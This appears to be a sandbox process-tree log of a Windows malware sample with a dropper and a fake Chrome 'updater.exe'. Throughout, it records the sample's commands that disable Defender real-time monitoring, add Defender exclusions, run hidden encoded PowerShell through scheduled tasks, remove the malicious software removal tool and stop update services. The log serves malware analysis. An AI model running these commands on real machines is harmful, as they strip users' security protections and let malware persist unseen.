C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\YAtyGvP.exe
C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\YAtyGvP.exe it /BiTdidlhxH 385118 /S
2⤵
PID:2380

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
PID:4028

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
4⤵
PID:3252

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:3624

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
6⤵
PID:3692

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
4⤵
PID:2724

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:2112

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
6⤵
PID:2696

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
4⤵
PID:3908

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:3236

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
6⤵
PID:2628

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
4⤵
PID:3196

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:4060

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
6⤵
PID:800

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
4⤵
PID:3328

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
PID:2944

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
6⤵
- Command and Scripting Interpreter: PowerShell
PID:2728

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
7⤵
PID:2992

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gtmfUbLKB" /SC once /ST 10:28:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:3196

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gtmfUbLKB"
3⤵
PID:3864

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gtmfUbLKB"
3⤵
PID:2004

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
3⤵
PID:3968

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
4⤵
PID:2464

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
3⤵
PID:2028

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
4⤵
PID:1576

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gpegmPoMc" /SC once /ST 03:57:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:3100

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gpegmPoMc"
3⤵
PID:1956

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gpegmPoMc"
3⤵
PID:3512

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
3⤵
PID:2568

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
4⤵
PID:1604

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
5⤵
- Command and Scripting Interpreter: PowerShell
PID:1720

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
6⤵
PID:3648

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4156

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
4⤵
PID:4180

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4192

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
4⤵
PID:4220

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4240

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
4⤵
PID:4260

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4268

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
4⤵
PID:4288

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\WPGfhLqOzAIwKSwi\kNgUtILn\pmIpOdwPGrEixgdj.wsf"
3⤵
PID:4296

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\WPGfhLqOzAIwKSwi\kNgUtILn\pmIpOdwPGrEixgdj.wsf"
3⤵
PID:4332

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:4412

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:4432

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:4464

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:4528

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:4552

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:4600

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:4628

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:4648

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:4672

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:4704

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:4732

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:4760

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
4⤵
PID:4792

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
4⤵
PID:4832

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:32
4⤵
PID:4852

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:64
4⤵
PID:4884

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
4⤵
PID:4912

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
4⤵
PID:4948

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:4972

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:5000

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:5032

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:5048

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:5080

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:5100

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:3972

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1668

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1532

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:3236

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2304

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:3388

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
4⤵
PID:3780

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1184

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:32
4⤵
PID:4076

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:64
4⤵
PID:712

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
4⤵
PID:4116

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
4⤵
PID:4164

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gvAskeVSn" /SC once /ST 07:54:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:4224

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gvAskeVSn"
3⤵
PID:4232

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gvAskeVSn"
3⤵
PID:3268

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
3⤵
PID:3968

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
4⤵
PID:4572

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
3⤵
PID:2208

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
4⤵
PID:4184

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 18:59:47 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\nAZCCTW.exe\" GH /eSCjdidSN 385118 /S" /V1 /F
3⤵
- Creates scheduled task(s)
PID:4596

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "XyyyteIMwZeutaZuw"
3⤵
PID:3832

C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\nAZCCTW.exe
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\nAZCCTW.exe GH /eSCjdidSN 385118 /S
2⤵
PID:848

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
PID:4084

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
4⤵
PID:1552

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:2820

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
6⤵
PID:3528

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
4⤵
PID:1728

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:1932

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
6⤵
PID:2068

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
4⤵
PID:640

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:4388

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
6⤵
PID:4340

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
4⤵
PID:1580

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:3052

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
6⤵
PID:3484

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
4⤵
PID:4424

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
PID:1372

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
6⤵
- Command and Scripting Interpreter: PowerShell
PID:3888

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\EE65.bat" "
1⤵
PID:3444

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
2⤵
PID:3356

C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
1⤵
PID:1780

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
2⤵
- Command and Scripting Interpreter: PowerShell
PID:1604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
2⤵
PID:3512

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
3⤵
PID:2172

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
2⤵
- Launches sc.exe
PID:4028

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:3272

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
2⤵
- Launches sc.exe
PID:1720

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
2⤵
- Launches sc.exe
PID:268

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
2⤵
- Launches sc.exe
PID:2256

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
PID:864

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
PID:2284

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
PID:2004

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
PID:2232

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:3200

C:\Windows\explorer.exe
explorer.exe
2⤵
